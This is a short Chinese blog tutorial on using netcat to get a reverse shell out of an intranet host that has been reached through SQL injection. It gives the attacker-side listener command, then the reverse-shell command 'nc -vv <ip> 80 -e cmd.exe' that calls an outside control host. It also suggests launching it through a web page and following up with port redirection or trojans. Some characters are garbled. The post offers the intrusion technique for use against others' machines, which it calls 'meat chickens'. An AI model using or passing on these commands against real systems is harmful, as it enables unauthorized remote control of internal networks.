nc命令小材大用

nc 命令小材大用

simeon

通过本文你可以学到：

1 、 SQL 注入内网渗透的一种思路

2 、 nc 命令的一种好用法

   内网渗透对于网络安全爱好者，特别是网络入侵检测时无疑是一种疼，很多时候我们遇到这种情况只有采取放弃，其实不然，完全使用另外一种方法来进行突破。很多人多知道 nc 号称瑞士军刀，是一款非常不错的网络安全工具，其强大的功能毫不逊于一款远程控制软件，只是我们没有挖掘其强大的功能而已。本文只是探讨如何来进行内网突破的思维。下面讲讲本文对 nc 的具体用法。

（一）在控制端监听端口

这个控制端可以是自己的肉鸡，可以是在具有独立 IP 的网络计算机上，一定要具有独立 IP ，否则无法反弹到该 IP 地址。使用命令如下：

Nc �Cvv �Cl �Cp port 例如 nc �Cvv �Cl �Cp 80

在控制端监听端口时，需要注意的是，需要先使用“ netstat -an ”查看网络端口的开放情况（图 1 ），选择一个未监听的端口，一般选择 80 ， 443 ， 446 ， 110 ， 25 ， 23 端口为好，当然其他未用端口也可以。

图 1 使用 netstat �Can 查看端口开情况

说明：如果控制端已经开放了我们要监听的端口，那么我们使用 nc 监听该端口不会成功， nc 程序会提示错误信息，如果监听正常，会显示“ Listening on  [any] 80 ……. ”字样（图 2 ）。

图 2 在控制端监听 80 端口

（二）在内网计算机开放端口

      在内网计算机上运行“ nc �Cvv ipaddress port �Ce cmd.exe ”，这里的 IPaddress 一定是控制端的 ip 地址，例如控制端的地址为“ 202.108. 33.32 ” ，且80 端口未开放，则在内网计算机上运行“ nc �Cvv -202.108. 33.32 80 �Ce cmd.exe ”即可。如果一切正常，则会反弹一个 dosshell 回来，跟 cmd 命令的运行界面差不多，就象在本机的 DOS 下操作一样，非常好用，可以粘贴命令，直接执行命令等（图 3 ）。使用“ net user ”命令，可以看到我的账号“ simeon ”在其中。

图 3 反弹 shell 成功

（三）其它运用

本文介绍的是如何使用 nc 来反弹内网的 shell ，在 sql 注入的过程中，很多时候遇到独立主机是内网 IP ，及时主机开放了 3389 也无法连接进去，这个时候，一个真正的 dosshell 就特别重要，通过网页执行 nc 命令，提供该内网一个 shell ，然后执行 lcx 端口重定向或者执行反弹木马或者其他命令，无疑是一个很好的解决方法。

（四）结束语

    本文就技术难度来说，并不是很大， nc 这个软件很多朋友都熟悉，可以这么说，搞网络安全的没有不熟悉 nc 这个软件的，但是对于 nc 命令的很多用法，不一定熟悉。想不起来曾经看过的一部电影，其中有这么一段话，高手就是将一个复杂的动作做到单一和简单！这跟真正的武林高手一样，不一定需要太多招式，一刀一剑就可以致命取胜。网络安全也是如此，对一个工具要熟能生巧，举一反三，才能出现更多的用法，更多的新的 idea ，期待大家新的发现。

本文出自 “simeon技术专栏” 博客，谢绝转载！